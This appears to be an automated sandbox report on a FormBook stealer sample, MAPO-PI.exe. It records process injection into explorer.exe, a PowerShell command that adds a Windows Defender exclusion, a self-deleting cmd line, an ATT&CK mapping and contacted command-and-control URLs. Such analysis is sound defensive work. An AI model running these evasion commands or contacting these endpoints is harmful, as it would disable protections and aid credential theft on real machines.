          Source: C:\Users\user\Desktop\MAPO-PI.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\MAPO-PI.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3472
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.240240784.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\MAPO-PI.exeQueries volume information: C:\Users\user\Desktop\MAPO-PI.exe VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Query Registry1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Security Software Discovery221Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSVirtualization/Sandbox Evasion31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing11Proc FilesystemSystem Information Discovery112Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 510736 Sample: MAPO-PI.exe Startdate: 28/10/2021 Architecture: WINDOWS Score: 100 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 8 other signatures 2->46 10 MAPO-PI.exe 4 2->10         started        process3 file4 32 C:\Users\user\AppData\...\MAPO-PI.exe.log, ASCII 10->32 dropped 58 Adds a directory exclusion to Windows Defender 10->58 60 Tries to detect virtualization through RDTSC time measurements 10->60 14 MAPO-PI.exe 10->14         started        17 powershell.exe 25 10->17         started        signatures5 process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 Queues an APC in another process (thread injection) 14->68 19 explorer.exe 14->19 injected 23 conhost.exe 17->23         started        process8 dnsIp9 34 www.transforming-leadership.com 159.65.10.143, 49790, 80 DIGITALOCEAN-ASNUS United States 19->34 36 diofis.com 109.232.217.55, 49795, 80 AEROTEK-ASTR Turkey 19->36 38 3 other IPs or domains 19->38 48 System process connects to network (likely due to code injection or exploit) 19->48 25 cmmon32.exe 19->25         started        signatures10 process11 signatures12 50 Self deletion via cmd delete 25->50 52 Modifies the context of a thread in another process (thread injection) 25->52 54 Maps a DLL or memory area into another process 25->54 56 Tries to detect virtualization through RDTSC time measurements 25->56 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          MAPO-PI.exe31%VirustotalBrowse
          MAPO-PI.exe39%ReversingLabsByteCode-MSIL.Trojan.Pwsx

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.0.MAPO-PI.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.MAPO-PI.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.MAPO-PI.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.MAPO-PI.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.diofis.com/hakkimizda/0%Avira URL Cloudsafe
          http://www.diofis.com/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
          http://www.diofis.com/blog/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/kahvaltilik-tarifler/0%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/hastaliklarda-beslenme-danismanligi/0%Avira URL Cloudsafe
          http://www.diofis.com/wp-content/themes/neve/style.min.css?ver=2.8.30%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/bireysel-beslenme-danismanligi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/saglikli-ve-pratik-roka-salatasi/0%Avira URL Cloudsafe
          http://www.diofis.com/#logo0%Avira URL Cloudsafe
          http://www.diofis.com/#organization0%Avira URL Cloudsafe
          http://www.diofis.com/2020/11/19/aspir-yagi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/maydanoz-cayi/0%Avira URL Cloudsafe
          http://www.diofis.com/category/guncel-diyet-meseleleri/0%Avira URL Cloudsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://www.diofis.com/wp-content/uploads/2020/09/cropped-cropped-diofis-logo-2-3.png0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/elma-cayi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/11/01/cikolatali-toplar/0%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/11/01/cennet-tatlisi/0%Avira URL Cloudsafe
          http://www.diofis.com/wp-json/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/portakalli-meyve-cayi/0%Avira URL Cloudsafe
          https://m0n.co/ga0%Avira URL Cloudsafe
          www.diofis.com/rigx/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/odem-cayi-2/0%Avira URL Cloudsafe
          http://www.diofis.com/category/sporcu-beslenmesi/0%Avira URL Cloudsafe
          http://www.diofis.com/wp-content/uploads/2020/09/cropped-diofis-logo-2.png0%Avira URL Cloudsafe
          http://www.diofis.com/feed/0%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/kurumsal-beslenme-danismanligi/0%Avira URL Cloudsafe
          http://www.diofis.com/category/tarifler/0%Avira URL Cloudsafe
          http://www.diofis.com?sccss=1&#038;ver=5.5.60%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/saglikli-ve-pratik-corba-tarifi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/11/01/ketojenik-beslenme/0%Avira URL Cloudsafe
          http://www.diofis.com/comments/feed/0%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/cocukluk-cagi-beslenme-danismanligi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/sebze-corbasi-tarifi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/yulafli-kahvalti/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/meyve-cayi/0%Avira URL Cloudsafe
          http://www.diofis.com/bize-ulasin/0%Avira URL Cloudsafe
          http://www.diofis.com/partnerlerimiz/0%Avira URL Cloudsafe
          http://www.diofis.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/saglikli-ve-pratik-salata-tarifi/0%Avira URL Cloudsafe
          http://www.lifeinformpodcast.com/rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm0%Avira URL Cloudsafe
          http://www.diofis.com/0%Avira URL Cloudsafe
          http://www.diofis.com/?s=0%Avira URL Cloudsafe
          http://www.transforming-leadership.com/rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH80%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/odem-cayi/0%Avira URL Cloudsafe
          http://www.diofis.com/rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV0%Avira URL Cloudsafe
          http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.60%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/kilo-koruma-beslenme-danismanligi/0%Avira URL Cloudsafe
          http://www.diofis.com/2020/11/27/sporcu-beslenmesinde-yeterli-ve-dengeli-beslenmenin-onemi/0%Avira URL Cloudsafe
          http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/0%Avira URL Cloudsafe
          http://www.diofis.com/#website0%Avira URL Cloudsafe
          http://www.diofis.com/2020/10/24/rahatlatici-cay/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.transforming-leadership.com
          		159.65.10.143
          		truetrue
            		unknown
            lifeinformpodcast.com
            		34.102.136.180
            		truefalse
              		unknown
              diofis.com
              		109.232.217.55
              		truetrue
                		unknown
                www.diofis.com
                		unknown
                		unknowntrue
                  		unknown
                  www.lifeinformpodcast.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    www.diofis.com/rigx/true
                    • Avira URL Cloud: safe
                    		low
                    http://www.lifeinformpodcast.com/rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/smfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.transforming-leadership.com/rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.diofis.com/rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMVtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.monsterinsights.com/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                      		high
                      http://www.diofis.com/hakkimizda/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
